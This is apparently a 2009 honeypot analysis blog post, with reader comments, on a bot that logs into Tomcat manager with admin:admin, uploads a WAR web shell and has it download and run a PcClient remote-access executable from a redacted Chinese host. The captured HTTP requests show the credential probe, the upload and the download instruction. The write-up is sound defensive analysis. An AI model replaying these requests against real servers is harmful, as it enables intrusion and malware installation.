We noticed a bit strange HTTP scans that were probing for /manager/html on our honeypots. After taking a closer look at the request it became pretty apparent what they were looking for:
Fri Mar 25 00:30:31 EET 2009 – /190.210.x.x:3625 -
GET /manager/html HTTP/1.1
Referer: http://x.x.x.x:8080/manager/html
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE 3.01)
Host: x.x.x.x:8080
Connection: Close
Cache-Control: no-cache
Authorization: Basic YWRtaW46YWRtaW4=
So, pretty obviously someone is scanning for Tomcat installations that have the manager application installed and using admin:admin as credentials. Instead of fiddling with low interaction honeypots we set up a live Tomcat installation with the above credentials and put a machine between the Tomcat and the router to run a tcpdump. After a day of waiting and watching an attacker came by:
190.26.x.x – admin [26/Mar/2009:21:32:13 -0000] “GET /manager/html HTTP/1.1″ 200 8714
190.26.x.x – admin [26/Mar/2009:21:32:13 -0000] “POST /manager/html/upload HTTP/1.0″ 200 8747
190.26.x.x – - [26/Mar/2009:21:32:15 -0000] “GET /killfexcepshell/index.jsp HTTP/1.1″ 404 763
190.26.x.x – admin [26/Mar/2009:21:32:38 -0000] “POST /manager/html/upload HTTP/1.0″ 200 9377
190.26.x.x – - [26/Mar/2009:21:32:43 -0000] “GET /killfexcepshell/index.jsp HTTP/1.1″ 200 48
As we can see, after probing the honeypot and seeing that it has a Tomcat server with weak passwords it uploads something:
POST /manager/html/upload HTTP/1.0
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=—————————032509203251046
Content-Length: 2495
Host: x.x.x.x:8080
Accept: text/html, */*
Accept-Language: zh-cn
Referer: http://x.x.x.x:8080/manager/html
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Authorization: Basic YWRtaW46YWRtaW4=
—————————–032509203251046
Content-Disposition: form-data; name=”deployWar”; filename=”C:\WINDOWS\system32\mui\fexcep\killfexcepshell.war”
Content-Type: application/x-zip-compressed
And what does the WAR contain? This:
As we can see from the POST, the infection is most likely coming from a Windows OS. Something that struck my eye was that even though the IP address is in Colombia the malware uses “Accept-Language: zh-cn” which basically suggests Chinese origin for the malware. Another interesting point is that the attacker downloaded the GIF image files that appear in the admin panel. That suggests it’s not a custom bot and propably more likely something that is running a hidden Internet Explorer window. But let’s check the rest.
Once it has succesfully uploaded, what does it do? It does only one request any: GET /killfexcepshell/index.jsp and after that nada.
So let’s take a closer look of the last request:
GET /killfexcepshell/index.jsp HTTP/1.1
Referer: http://x.x.x.x:8080/killfexcepshell/index.jsp
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; IE 7)
Host: x.x.x.x:8080
Connection: Close
Cache-Control: no-cache
Cache-Vip-Url:http://www.<hidden>.cn/tomcat.exe
And the last response:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=26482330DBFE986AC0705B4691E0C66D; Path=/killfexcepshell
Content-Type: text/html;charset=utf-8
Content-Length: 48
Date: Thu, 26 Mar 2009 01:32:43 GMT
Connection: closeFailure!Because Remote computer system is Linux!
Umm, Cache-Vip-URL? Pointing to an executable in China? Must be Very Important indeed. Let’s take a look at what index.jsp does. (not necessarily in this order though.):
- It rewrites tomcat-users.xml to contain following:
<?xml version=’1.0′ encoding=’utf-8′?>
<tomcat-users>
<role rolename=”tomcat”/>
<role rolename=”role1″ />
<role rolename=”manager”/>
<role rolename=”admin”/>
<user username=”admin” password=”<hidden>” roles=”admin,manager”/>
</tomcat-users>
Yes true, it cripples the administration capabilities from Tomcat.
- Downloads a file. It fetches the URL-parameter from the Cache-Vip-URL. And after downloading it tries to execute but as you can see from the response it fails since our honeypot was linux.
We have hidden the password from the snippet above since the authors have bug in their package. They’re supposed to generate a random password for each infected Tomcat but someone had a brainfart during the coding and the generation is not working so the password is static.
The binary that gets downloaded if the Tomcat server is running on Windows is a malware variant commonly going under the name PcClient. So basically a remote administration tool that connects to the C&C at <hidden>.vicp.net, tcp port 126.
This is a good example of the blackhats trying to find any ways to wriggle into computers. Tomcat is not really too common to run into and Tomcat has not had default credentials for the manager application in past several years. Still, that vector is actively being scanned for a free passage into computers.
Hi!
That’s a useful post…this just happened to me.
I think I have a “strong password” configured in my Tomcat Server, however I saw this Application installed.
How come it got installed?
My tomcat User’s file looks sane however…
Any comments?
Thanks!
Have you checked the logfiles? If you want I can take a look at them to see if there are additional installation vectors.
Also if you have the uploaded .war or the installed filestructure (inside webapps) I’d love to take a look at them.